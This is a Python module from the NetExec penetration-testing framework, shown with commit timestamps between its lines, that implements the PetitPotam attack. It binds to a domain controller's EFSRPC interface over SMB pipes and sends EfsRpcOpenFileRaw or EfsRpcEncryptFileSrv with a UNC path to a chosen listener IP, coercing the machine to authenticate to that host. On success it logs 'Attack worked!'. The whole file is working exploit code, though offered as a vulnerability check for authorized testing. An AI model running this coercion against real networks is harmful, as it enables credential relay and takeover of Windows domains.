NetExec/nxc/modules/petitpotam.py

297 lines
9.0 KiB
Python
Raw Normal View History

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
2021-12-08 12:21:13 +00:00
# From https://github.com/topotam/PetitPotam
# All credit to @topotam
# Module by @mpgn_x64
import sys
2021-12-08 12:21:13 +00:00
from impacket import system_errors
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import ULONG, WSTR, DWORD, PCHAR, RPC_SID, LPWSTR
2023-05-02 15:17:59 +00:00
from impacket.dcerpc.v5.rpcrt import (
DCERPCException,
RPC_C_AUTHN_WINNT,
RPC_C_AUTHN_LEVEL_PKT_PRIVACY,
RPC_C_AUTHN_GSS_NEGOTIATE,
)
2021-12-08 12:21:13 +00:00
from impacket.uuid import uuidtup_to_bin
class NXCModule:
2023-05-02 15:17:59 +00:00
name = "petitpotam"
2023-05-08 18:39:36 +00:00
description = "Module to check if the DC is vulnerable to PetitPotam, credit to @topotam"
2023-05-02 15:17:59 +00:00
supported_protocols = ["smb"]
2021-12-08 12:21:13 +00:00
opsec_safe = True
2023-03-27 20:06:17 +00:00
multiple_hosts = True
2021-12-08 12:21:13 +00:00
def options(self, context, module_options):
"""
LISTENER IP of your listener
PIPE Default PIPE (default: lsarpc)
"""
2021-12-08 12:21:13 +00:00
self.listener = "127.0.0.1"
2023-05-02 15:17:59 +00:00
if "LISTENER" in module_options:
self.listener = module_options["LISTENER"]
2021-12-08 12:46:31 +00:00
self.pipe = "lsarpc"
2023-05-02 15:17:59 +00:00
if "PIPE" in module_options:
self.pipe = module_options["PIPE"]
2021-12-08 12:21:13 +00:00
def on_login(self, context, connection):
dce = coerce(
connection.username,
password=connection.password,
domain=connection.domain,
lmhash=connection.lmhash,
nthash=connection.nthash,
2023-07-03 17:18:33 +00:00
aesKey=connection.aesKey,
2023-05-08 18:39:36 +00:00
target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain,
pipe=self.pipe,
do_kerberos=connection.kerberos,
dc_host=connection.kdcHost,
target_ip=connection.host,
2023-05-02 15:17:59 +00:00
context=context,
)
if efs_rpc_open_file_raw(dce, self.listener, context):
2021-12-08 12:21:13 +00:00
context.log.highlight("VULNERABLE")
2021-12-18 20:28:34 +00:00
context.log.highlight("Next step: https://github.com/topotam/PetitPotam")
try:
host = context.db.get_hosts(connection.host)[0]
2023-05-02 15:17:59 +00:00
context.db.add_host(
host.ip,
host.hostname,
host.domain,
host.os,
host.smbv1,
host.signing,
petitpotam=True,
)
2023-09-20 15:59:16 +00:00
except Exception:
context.log.debug("Error updating petitpotam status in database")
2021-12-08 12:21:13 +00:00
class DCERPCSessionError(DCERPCException):
def __init__(self, error_string=None, error_code=None, packet=None):
DCERPCException.__init__(self, error_string, error_code, packet)
2023-05-02 15:17:59 +00:00
def __str__(self):
2021-12-08 12:21:13 +00:00
key = self.error_code
if key in system_errors.ERROR_MESSAGES:
error_msg_short = system_errors.ERROR_MESSAGES[key][0]
error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
2023-05-02 15:17:59 +00:00
return "EFSR SessionError: code: 0x%x - %s - %s" % (
self.error_code,
error_msg_short,
error_msg_verbose,
)
2021-12-08 12:21:13 +00:00
else:
2023-09-24 04:06:51 +00:00
return f"EFSR SessionError: unknown error code: 0x{self.error_code:x}"
2021-12-08 12:21:13 +00:00
################################################################################
# STRUCTURES
################################################################################
class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
align = 1
2023-05-02 15:17:59 +00:00
structure = (("Data", "20s"),)
2021-12-08 12:21:13 +00:00
class EFS_EXIM_PIPE(NDRSTRUCT):
align = 1
2023-05-02 15:17:59 +00:00
structure = (("Data", ":"),)
2021-12-08 12:21:13 +00:00
class EFS_HASH_BLOB(NDRSTRUCT):
structure = (
2023-05-02 15:17:59 +00:00
("Data", DWORD),
("cbData", PCHAR),
2021-12-08 12:21:13 +00:00
)
2021-12-08 12:21:13 +00:00
class EFS_RPC_BLOB(NDRSTRUCT):
structure = (
2023-05-02 15:17:59 +00:00
("Data", DWORD),
("cbData", PCHAR),
2021-12-08 12:21:13 +00:00
)
2021-12-08 12:21:13 +00:00
class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
structure = (
2023-05-02 15:17:59 +00:00
("Type", DWORD),
("Data", DWORD),
("cbData", PCHAR),
)
2021-12-08 12:21:13 +00:00
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
structure = (
2023-05-02 15:17:59 +00:00
("Lenght", DWORD),
("SID", RPC_SID),
("Hash", EFS_HASH_BLOB),
("Display", LPWSTR),
)
2021-12-08 12:21:13 +00:00
class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
structure = (
2023-05-02 15:17:59 +00:00
("Lenght", DWORD),
("SID", RPC_SID),
("Hash", EFS_CERTIFICATE_BLOB),
)
2021-12-08 12:21:13 +00:00
class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
align = 1
structure = (
2023-05-02 15:17:59 +00:00
("Cert", DWORD),
("Users", ENCRYPTION_CERTIFICATE_HASH),
2021-12-08 12:21:13 +00:00
)
class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):
2021-12-08 12:21:13 +00:00
structure = (
2023-05-02 15:17:59 +00:00
("Type", DWORD),
("HASH", ENCRYPTION_CERTIFICATE_HASH_LIST),
("Certif", ENCRYPTION_CERTIFICATE),
("Blob", EFS_RPC_BLOB),
)
2021-12-08 12:21:13 +00:00
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
align = 1
2023-05-02 15:17:59 +00:00
structure = (("Data", ":"),)
2021-12-08 12:21:13 +00:00
2021-12-08 12:21:13 +00:00
################################################################################
# RPC CALLS
################################################################################
class EfsRpcOpenFileRaw(NDRCALL):
opnum = 0
structure = (
2023-05-02 15:17:59 +00:00
("fileName", WSTR),
("Flag", ULONG),
2021-12-08 12:21:13 +00:00
)
2021-12-08 12:21:13 +00:00
class EfsRpcOpenFileRawResponse(NDRCALL):
structure = (
2023-05-02 15:17:59 +00:00
("hContext", EXIMPORT_CONTEXT_HANDLE),
("ErrorCode", ULONG),
2021-12-08 12:21:13 +00:00
)
2021-12-08 12:21:13 +00:00
class EfsRpcEncryptFileSrv(NDRCALL):
opnum = 4
2023-05-02 15:17:59 +00:00
structure = (("FileName", WSTR),)
class EfsRpcEncryptFileSrvResponse(NDRCALL):
2023-05-02 15:17:59 +00:00
structure = (("ErrorCode", ULONG),)
def coerce(
username,
password,
domain,
lmhash,
nthash,
2023-07-03 17:18:33 +00:00
aesKey,
2023-05-02 15:17:59 +00:00
target,
pipe,
do_kerberos,
dc_host,
target_ip=None,
context=None,
):
binding_params = {
2023-05-02 15:17:59 +00:00
"lsarpc": {
"stringBinding": r"ncacn_np:%s[\PIPE\lsarpc]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
2023-05-02 15:17:59 +00:00
"efsr": {
"stringBinding": r"ncacn_np:%s[\PIPE\efsrpc]" % target,
"MSRPC_UUID_EFSR": ("df1941c5-fe89-4e79-bf10-463657acf44d", "1.0"),
},
2023-05-02 15:17:59 +00:00
"samr": {
"stringBinding": r"ncacn_np:%s[\PIPE\samr]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
2023-05-02 15:17:59 +00:00
"lsass": {
"stringBinding": r"ncacn_np:%s[\PIPE\lsass]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
2023-05-02 15:17:59 +00:00
"netlogon": {
"stringBinding": r"ncacn_np:%s[\PIPE\netlogon]" % target,
"MSRPC_UUID_EFSR": ("c681d488-d850-11d0-8c52-00c04fd90f7e", "1.0"),
},
}
2023-05-08 18:39:36 +00:00
rpc_transport = transport.DCERPCTransportFactory(binding_params[pipe]["stringBinding"])
2023-05-02 15:17:59 +00:00
if hasattr(rpc_transport, "set_credentials"):
rpc_transport.set_credentials(
username=username,
password=password,
domain=domain,
lmhash=lmhash,
nthash=nthash,
2023-07-03 17:18:33 +00:00
aesKey=aesKey,
2023-05-02 15:17:59 +00:00
)
if target_ip:
rpc_transport.setRemoteHost(target_ip)
dce = rpc_transport.get_dce_rpc()
dce.set_auth_type(RPC_C_AUTHN_WINNT)
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
if do_kerberos:
rpc_transport.set_kerberos(do_kerberos, kdcHost=dc_host)
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
2023-09-24 04:06:51 +00:00
context.log.info(f"[-] Connecting to {binding_params[pipe]['stringBinding']}")
try:
dce.connect()
except Exception as e:
2023-09-24 04:06:51 +00:00
context.log.debug(f"Something went wrong, check error status => {str(e)}")
sys.exit()
context.log.info("[+] Connected!")
2023-09-24 04:06:51 +00:00
context.log.info(f"[+] Binding to {binding_params[pipe]['MSRPC_UUID_EFSR'][0]}")
try:
2023-05-02 15:17:59 +00:00
dce.bind(uuidtup_to_bin(binding_params[pipe]["MSRPC_UUID_EFSR"]))
except Exception as e:
2023-09-24 04:06:51 +00:00
context.log.debug(f"Something went wrong, check error status => {str(e)}")
sys.exit()
context.log.info("[+] Successfully bound!")
return dce
def efs_rpc_open_file_raw(dce, listener, context=None):
try:
request = EfsRpcOpenFileRaw()
2023-09-24 04:06:51 +00:00
request["fileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
2023-05-02 15:17:59 +00:00
request["Flag"] = 0
2023-09-20 15:59:16 +00:00
dce.request(request)
except Exception as e:
2023-05-02 15:17:59 +00:00
if str(e).find("ERROR_BAD_NETPATH") >= 0:
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
context.log.info("[+] Attack worked!")
return True
2023-05-02 15:17:59 +00:00
if str(e).find("rpc_s_access_denied") >= 0:
2023-05-08 18:39:36 +00:00
context.log.info("[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!")
2023-05-02 15:17:59 +00:00
context.log.info("[+] OK! Using unpatched function!")
context.log.info("[-] Sending EfsRpcEncryptFileSrv!")
try:
request = EfsRpcEncryptFileSrv()
2023-09-24 04:06:51 +00:00
request["FileName"] = f"\\\\{listener}\\test\\Settings.ini\x00"
2023-09-20 15:59:16 +00:00
dce.request(request)
except Exception as e:
2023-05-02 15:17:59 +00:00
if str(e).find("ERROR_BAD_NETPATH") >= 0:
context.log.info("[+] Got expected ERROR_BAD_NETPATH exception!!")
context.log.info("[+] Attack worked!")
return True
else:
2023-09-24 04:06:51 +00:00
context.log.debug(f"Something went wrong, check error status => {str(e)}")
else:
2023-09-24 04:06:51 +00:00
context.log.debug(f"Something went wrong, check error status => {str(e)}")